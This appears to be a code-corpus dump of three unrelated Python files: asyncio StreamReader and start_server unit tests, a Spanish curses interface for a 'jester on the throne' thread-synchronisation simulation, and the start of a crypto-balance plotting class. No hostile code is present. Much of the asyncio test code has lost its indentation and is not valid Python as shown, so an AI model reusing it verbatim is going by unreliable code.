stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
    # readuntil() rejects an empty separator with ValueError before
    # any reading takes place.
    stream = asyncio.StreamReader(loop=self.loop,
                                  _asyncio_internal=True)
    with self.assertRaisesRegex(ValueError, 'Separator should be'):
        self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
    """LimitOverrunError wording when the separator straddles the limit.

    While the separator is still incomplete the error message says it
    was 'not found'; once it is fully buffered the message says it
    'is found' past the limit.  The buffer is left untouched in both
    cases.  (Fix: dropped the unused ``as cm`` bindings — the caught
    exception object was never inspected.)
    """
    stream = asyncio.StreamReader(loop=self.loop, limit=3,
                                  _asyncio_internal=True)
    stream.feed_data(b'some dataAA')

    # Separator not yet complete in the buffer -> "not found".
    with self.assertRaisesRegex(asyncio.LimitOverrunError,
                                'not found'):
        self.loop.run_until_complete(stream.readuntil(b'AAA'))
    self.assertEqual(b'some dataAA', stream._buffer)

    stream.feed_data(b'A')

    # Separator now present, but beyond the limit -> "is found".
    with self.assertRaisesRegex(asyncio.LimitOverrunError,
                                'is found'):
        self.loop.run_until_complete(stream.readuntil(b'AAA'))
    self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
@asyncio.coroutine
def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2]))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
    """End-to-end echo test for asyncio.start_server().

    Runs the same one-line echo client against two server variants:
    one whose client handler is a coroutine, and one whose handler is
    a plain callback that spawns a task.
    """

    class MyServer:
        def __init__(self, loop):
            self.server = None
            self.loop = loop

        async def handle_client(self, client_reader, client_writer):
            # Echo a single line back to the client, then close.
            data = await client_reader.readline()
            client_writer.write(data)
            await client_writer.drain()
            client_writer.close()
            await client_writer.wait_closed()

        def start(self):
            # Bind to an OS-assigned port and serve on the ready socket.
            sock = socket.create_server(('127.0.0.1', 0))
            self.server = self.loop.run_until_complete(
                asyncio.start_server(self.handle_client,
                                     sock=sock,
                                     loop=self.loop))
            return sock.getsockname()

        def handle_client_callback(self, client_reader, client_writer):
            # Plain-callback variant: delegate to the coroutine handler.
            self.loop.create_task(self.handle_client(client_reader,
                                                     client_writer))

        def start_callback(self):
            # Probe for a free port, close the probe socket, then
            # start the server on that host/port with the callback.
            sock = socket.create_server(('127.0.0.1', 0))
            addr = sock.getsockname()
            sock.close()
            self.server = self.loop.run_until_complete(
                asyncio.start_server(self.handle_client_callback,
                                     host=addr[0], port=addr[1],
                                     loop=self.loop))
            return addr

        def stop(self):
            if self.server is not None:
                self.server.close()
                self.loop.run_until_complete(self.server.wait_closed())
                self.server = None

    async def client(addr):
        reader, writer = await asyncio.open_connection(
            *addr, loop=self.loop)
        # send a line
        writer.write(b"hello world!\n")
        # read it back
        msgback = await reader.readline()
        writer.close()
        await writer.wait_closed()
        return msgback

    # Collect unexpected event-loop errors; must stay empty.
    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))

    # test the server variant with a coroutine as client handler
    server = MyServer(self.loop)
    addr = server.start()
    msg = self.loop.run_until_complete(asyncio.Task(client(addr),
                                                    loop=self.loop))
    server.stop()
    self.assertEqual(msg, b"hello world!\n")

    # test the server variant with a callback as client handler
    server = MyServer(self.loop)
    addr = server.start_callback()
    msg = self.loop.run_until_complete(asyncio.Task(client(addr),
                                                    loop=self.loop))
    server.stop()
    self.assertEqual(msg, b"hello world!\n")

    self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
    # See asyncio issue 168.  This test is derived from the example
    # subprocess_attach_read_pipe.py, but we configure the
    # StreamReader's limit (1) to be smaller than the size of the
    # data written (4 bytes), so read(-1) must cope with a buffer
    # larger than the limit.  Also we must explicitly attach a child
    # watcher to the event loop.
    code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
    rfd, wfd = os.pipe()
    args = [sys.executable, '-c', code, str(wfd)]

    # Unbuffered binary handle on the read end, wired to a
    # StreamReader through connect_read_pipe().
    pipe = open(rfd, 'rb', 0)
    reader = asyncio.StreamReader(loop=self.loop, limit=1,
                                  _asyncio_internal=True)
    protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop,
                                            _asyncio_internal=True)
    transport, _ = self.loop.run_until_complete(
        self.loop.connect_read_pipe(lambda: protocol, pipe))

    watcher = asyncio.SafeChildWatcher()
    watcher.attach_loop(self.loop)
    try:
        asyncio.set_child_watcher(watcher)
        # The child inherits wfd and writes b'data' to it.
        create = asyncio.create_subprocess_exec(*args,
                                                pass_fds={wfd},
                                                loop=self.loop)
        proc = self.loop.run_until_complete(create)
        self.loop.run_until_complete(proc.wait())
    finally:
        asyncio.set_child_watcher(None)

    os.close(wfd)
    # read(-1) returns the whole payload despite limit=1.
    data = self.loop.run_until_complete(reader.read(-1))
    self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader(_asyncio_internal=True)
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader, _asyncio_internal=True)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
    """drain() must fail, not spin forever, when the peer closes.

    See http://bugs.python.org/issue25441.  This test should not use
    asyncio for the mock server; the whole point of the test is to
    test for a bug in drain() where it never gives up the event loop
    but the socket is closed on the server side.

    Fix: ``Thread.setDaemon(True)`` is deprecated (since Python 3.10)
    in favor of assigning the ``daemon`` attribute.
    """
    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
    q = queue.Queue()

    def server():
        # Runs in a separate thread: accept one client, close it.
        with socket.create_server(('localhost', 0)) as sock:
            addr = sock.getsockname()
            q.put(addr)
            clt, _ = sock.accept()
            clt.close()

    async def client(host, port):
        reader, writer = await asyncio.open_connection(
            host, port, loop=self.loop)
        while True:
            writer.write(b"foo\n")
            await writer.drain()

    # Start the server thread and wait for it to be listening.
    thread = threading.Thread(target=server)
    thread.daemon = True
    thread.start()
    addr = q.get()

    # Should not be stuck in an infinite loop.
    with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
                            BrokenPipeError)):
        self.loop.run_until_complete(client(*addr))

    # Clean up the thread.  (Only on success; on failure, it may
    # be stuck in accept().)
    thread.join()
    self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123,
_asyncio_internal=True)
self.assertEqual("<StreamReader limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<StreamReader waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader transport=<Transport>>", repr(stream))
def test_IncompleteReadError_pickleable(self):
    """IncompleteReadError survives a pickle round-trip at every
    protocol, preserving message, partial data and expected count."""
    err = asyncio.IncompleteReadError(b'abc', 10)
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        with self.subTest(pickle_protocol=proto):
            restored = pickle.loads(pickle.dumps(err, protocol=proto))
            self.assertEqual(str(restored), str(err))
            self.assertEqual(restored.partial, err.partial)
            self.assertEqual(restored.expected, err.expected)
def test_LimitOverrunError_pickleable(self):
    """LimitOverrunError survives a pickle round-trip at every
    protocol, preserving its message and consumed byte count."""
    err = asyncio.LimitOverrunError('message', 10)
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        with self.subTest(pickle_protocol=proto):
            restored = pickle.loads(pickle.dumps(err, protocol=proto))
            self.assertEqual(str(restored), str(err))
            self.assertEqual(restored.consumed, err.consumed)
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_del_stream_before_sock_closing(self):
    """Dropping the last refs to an open stream closes its socket and
    reports exactly one garbage-collection warning through the event
    loop's exception handler.

    Fix: removed a redundant duplicate of the
    ``assertEqual(1, len(messages))`` assertion (it appeared both
    before and after the fileno check).
    """
    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))

    with test_utils.run_test_server() as httpd:
        rd, wr = self.loop.run_until_complete(
            asyncio.open_connection(*httpd.address, loop=self.loop))
        sock = wr.get_extra_info('socket')
        self.assertNotEqual(sock.fileno(), -1)

        wr.write(b'GET / HTTP/1.0\r\n\r\n')
        f = rd.readline()
        data = self.loop.run_until_complete(f)
        self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')

        # drop refs to reader/writer
        del rd
        del wr
        gc.collect()
        # make a chance to close the socket
        test_utils.run_briefly(self.loop)

        self.assertEqual(sock.fileno(), -1)
        self.assertEqual(1, len(messages))
        self.assertEqual('An open stream object is being garbage '
                         'collected; call "stream.close()" explicitly.',
                         messages[0]['message'])
def test_del_stream_before_connection_made(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
rd = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
pr = asyncio.StreamReaderProtocol(rd, loop=self.loop,
_asyncio_internal=True)
del rd
gc.collect()
tr, _ = self.loop.run_until_complete(
self.loop.create_connection(
lambda: pr, *httpd.address))
sock = tr.get_extra_info('socket')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(1, len(messages))
self.assertEqual('An open stream was garbage collected prior to '
'establishing network connection; '
'call "stream.close()" explicitly.',
messages[0]['message'])
def test_async_writer_api(self):
async def inner(httpd):
rd, wr = await asyncio.open_connection(*httpd.address)
await wr.write(b'GET / HTTP/1.0\r\n\r\n')
data = await rd.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await rd.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
await wr.close()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api_exception_after_close(self):
    """write() on a closed writer must raise ConnectionResetError.

    Fix: this method originally reused the name
    ``test_async_writer_api``, silently shadowing the identically
    named test defined just above it so that test never ran.  Renamed
    to describe what it actually checks (still discovered via the
    ``test_`` prefix).
    """
    async def inner(httpd):
        rd, wr = await asyncio.open_connection(*httpd.address)
        await wr.write(b'GET / HTTP/1.0\r\n\r\n')
        data = await rd.readline()
        self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
        data = await rd.read()
        self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
        wr.close()
        # Writing after close() must surface the broken connection.
        with self.assertRaises(ConnectionResetError):
            await wr.write(b'data')

    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))

    with test_utils.run_test_server() as httpd:
        self.loop.run_until_complete(inner(httpd))

    self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
# See http://bugs.python.org/issue35065
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address,
loop=self.loop))
f = wr.close()
self.loop.run_until_complete(f)
assert rd.at_eof()
f = rd.read()
data = self.loop.run_until_complete(f)
assert data == b''
self.assertEqual(messages, [])
def test_stream_reader_create_warning(self):
with self.assertWarns(DeprecationWarning):
asyncio.StreamReader(loop=self.loop)
def test_stream_reader_protocol_create_warning(self):
reader = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
with self.assertWarns(DeprecationWarning):
asyncio.StreamReaderProtocol(reader, loop=self.loop)
def test_stream_writer_create_warning(self):
reader = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
proto = asyncio.StreamReaderProtocol(reader, loop=self.loop,
_asyncio_internal=True)
with self.assertWarns(DeprecationWarning):
asyncio.StreamWriter('transport', proto, reader, self.loop)
if __name__ == '__main__':
    # Run this test module under unittest's CLI runner.
    unittest.main()
|
interfaz.py | # -*- coding: utf-8 -*-
import curses
from time import sleep
import proyecto as pyt
import config as c
from threading import Semaphore, Thread
def menu():
    """Curses front-end for the 'jester on the throne' simulation.

    Shows a title menu; option 1 displays the problem statement,
    option 2 runs the visual simulation, starting the king / jester /
    courtier threads (once) and redrawing the stage each time a worker
    signals an update.  'q' quits; 's' returns to the menu.
    """
    # Initialize the screen and get the console dimensions.
    scr = curses.initscr()
    curses.noecho()
    dims = scr.getmaxyx()
    hilosCorriendo = False
    q = -1
    # Main loop: keep showing the menu until 'q' (113) or 'Q' (81).
    while q != 113 and q != 81:
        scr.nodelay(1)
        q = scr.getch()
        scr.clear()
        # Title screen (ASCII art banner + options).
        scr.addstr(1,dims[1]-24, 'Presione \'q\' para salir')
        scr.addstr(2,(dims[1]-39)//2,' _____ _ _ __ ')
        scr.addstr(3,(dims[1]-39)//2,'| ___| | | | / _| ')
        scr.addstr(4,(dims[1]-39)//2,'| |__ | | | |__ _ _| |_ ___ _ __ ')
        scr.addstr(5,(dims[1]-39)//2,'| __|| | | \'_ \\| | | | _/ _ \\| \'_ \\ ')
        scr.addstr(6,(dims[1]-39)//2,'| |___| | | |_) | |_| | || (_) | | | |')
        scr.addstr(7,(dims[1]-39)//2,'\\____/|_| |_.__/ \\__,_|_| \\___/|_| |_|')
        scr.addstr(8,(dims[1]-50)//2,' _ _ \n')
        scr.addstr(9,(dims[1]-50)//2,' | | | | \n')
        scr.addstr(10,(dims[1]-50)//2,' ___ _ __ ___| | | |_ _ __ ___ _ __ ___ \n')
        scr.addstr(11,(dims[1]-50)//2,' / _ \\ \'_ \\ / _ \\ | | __| \'__/ _ \\| \'_ \\ / _ \\ \n')
        scr.addstr(12,(dims[1]-50)//2,'| __/ | | | | __/ | | |_| | | (_) | | | | (_) |\n')
        scr.addstr(13,(dims[1]-50)//2,' \\___|_| |_| \\___|_| \\__|_| \\___/|_| |_|\\___/ \n')
        scr.addstr(16,(dims[1]//2)-15,'1. El problema')
        scr.addstr(18,(dims[1]//2)-15,"""2. Ejecución visual
Opcion:""")
        scr.refresh()
        s = -1
        # 1. The problem statement ('1' == 49).
        if q == 49:
            scr.clear()
            scr.nodelay(1)
            # Show the problem description until 's' (115) / 'S' (83).
            while s != 115 and s != 83:
                scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
                scr.addstr(2, (dims[1]-20)//2,'El bufón en el trono')
                scr.addstr(3, 2,"""
El bufón de la corte tiene un pasatiempo secreto:
le gusta disfrazarse del rey y sentarse en el trono.
Sin embargo, solo puede hacer esto cuando no hay nadie presente
en la sala: ni el rey ni los cortesanos.
-El bufón aprovechará cualquier oportunidad que tenga para darse este lujo.
-El rey suele ausentarse por periodos considerables de tiempo,
mientras que varios cortesanos pueden entrar y salir de la sala.
-Si el rey llega mientras el bufón está sentado,
el bufón tiene que levantarse inmediatamente y cederle el trono.
-Si un cortesano llega mientras el bufón está sentado,
pensará que es el rey y no lo molestará.
-El bufón también es impaciente, por lo que si cuenta que ya pasaron 10 cortesanos
por la sala y no lo han dejado a solas con el trono, aún en presencia del rey, cerrará maliciosamente
la puerta de los cortesanos y esperará a que todos se vayan.
-Los cortesanos tendrán que esperar afuera. Desafortunadamente,
cuando hay 5 cortesanos esperando, éstos se ponen impacientes,
y el bufón tiene abrirles la puerta, aún si no está sentado.""")
                scr.nodelay(0)
                s = scr.getch()
                scr.clear()
        # 2. Visual execution ('2' == 50).
        elif q == 50:
            scr.clear()
            scr.nodelay(1)
            # Rolling list of the last 10 events.
            textoEntrante = [""]*10
            # Create and start the worker threads the first time we
            # enter here (they keep running across menu visits).
            if not hilosCorriendo:
                hiloRey = Thread(target = pyt.rey, args = [])
                hiloBufon = Thread(target = pyt.bufon, args = [])
                hiloCortesanos = Thread(target = pyt.llegadaCortesanos, args = [])
                hiloRey.start()
                hiloBufon.start()
                hiloCortesanos.start()
                hilosCorriendo = True
            # Open the turnstile so courtiers are generated.
            c.pausa.release()
            while s != 115 and s != 83:
                s = scr.getch()
                # Wait until a worker thread signals an update.
                c.sigHilos.acquire()
                scr.clear()
                # Draw the current state of the stage.
                scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
                scr.addstr(2,(dims[1]-20)//2,"El bufón en el trono")
                scr.addstr(4,(dims[1]-23)//2,c.grafico[0])
                scr.addstr(5,(dims[1]-23)//2,c.grafico[1])
                scr.addstr(6,(dims[1]-23)//2,c.grafico[2])
                scr.addstr(7,(dims[1]-23)//2,c.grafico[3])
                scr.addstr(8,(dims[1]-23)//2,c.grafico[4])
                scr.addstr(9,(dims[1]-23)//2,c.grafico[5])
                scr.addstr(10,(dims[1]-23)//2,c.grafico[6])
                scr.addstr(12,(dims[1]-31)//2,"B-Bufon C-Cortesano K-Rey")
                # Shift the recent-events list and show it,
                # newest entry last on screen.
                for i in reversed(range(9)):
                    textoEntrante[i+1] = textoEntrante[i]
                textoEntrante[0] = c.grafico[7]
                scr.addstr(14,(dims[1]-66)//2,textoEntrante[9])
                scr.addstr(15,(dims[1]-66)//2,textoEntrante[8])
                scr.addstr(16,(dims[1]-66)//2,textoEntrante[7])
                scr.addstr(17,(dims[1]-66)//2,textoEntrante[6])
                scr.addstr(18,(dims[1]-66)//2,textoEntrante[5])
                scr.addstr(19,(dims[1]-66)//2,textoEntrante[4])
                scr.addstr(20,(dims[1]-66)//2,textoEntrante[3])
                scr.addstr(21,(dims[1]-66)//2,textoEntrante[2])
                scr.addstr(22,(dims[1]-66)//2,textoEntrante[1])
                scr.addstr(23,(dims[1]-66)//2,textoEntrante[0])
                scr.refresh()
                sleep(0.25)
                # Signal the actor that the screen update is done.
                c.sigInterfaz.release()
            # Close the turnstile to stop generating courtiers.
            c.pausa.acquire()
    sleep(0.05)
    # NOTE(review): endwin() is not in a try/finally, so an exception
    # inside the loop would leave the terminal in curses mode.
    curses.endwin()
menu() |
cryptoAnalyzer.py | #**************************************************************
# Created by: Adam Musciano
# Description: Monitors balances of different cryptocurrencies
#
#
#*************************************************************
# mysql find balance and time for crypto > select amount_usd, insertedTime from balances where crypto="ethereum" ORDER BY id ASC
import json
import datetime
from time import sleep
import _mysql
import pandas as pd
import numpy as np
import plotly.plotly as py
import plotly.graph_objs as go
import plotly
import threading
class CryptoAnalyzer():
    """Creates graphs and spots trends of various crypto's using retrieved data from balanceLogger.

    Balance rows are read from the MySQL ``balances`` table and rendered
    with plotly, either uploaded to a plotly account (online mode) or
    written to a local HTML file (offline mode).
    """
    # Placeholder credentials; real values are loaded from
    # ../config/config.json by __loadFiles() during __init__.
    __dbPass = ""
    __dbUser = ""
    __dbHost = ""
    __dbName = ""
    __plotlyUsername = ""
    __plotlyKey = ""
    # When True, figures are uploaded to plotly instead of saved locally.
    isOnline = False

    def __loadFiles(self):
        """Load plotly and database credentials from ../config/config.json."""
        with open('../config/config.json', mode='r') as config_file:
            config = json.load(config_file)
        plotly_info = config['plotly']
        self.__plotlyUsername = plotly_info['username']
        self.__plotlyKey = plotly_info['key']
        database_info = config['database']
        self.__dbPass = database_info['dbpassword']
        self.__dbUser = database_info['dbuser']
        self.__dbHost = database_info['dbhost']
        self.__dbName = database_info['dbname']

    def __toUnixTime(self, dt):
        """Return naive datetime *dt* as milliseconds since the Unix epoch."""
        epoch = datetime.datetime.utcfromtimestamp(0)
        return (dt - epoch).total_seconds() * 1000

    @staticmethod
    def _parseTimestamp(timestamp):
        """Parse a ``YYYY-MM-DD H:M[:...]`` string into a datetime.

        Seconds and any further colon-separated components are ignored,
        matching the minute resolution used by the balance logger.
        Replaces three previously duplicated copies of this parsing code.
        """
        parts = str(timestamp).split()
        year, month, day = (int(v) for v in parts[0].split("-"))
        time_fields = parts[1].split(":")
        return datetime.datetime(year=year, month=month, day=day,
                                 hour=int(time_fields[0]),
                                 minute=int(time_fields[1]))

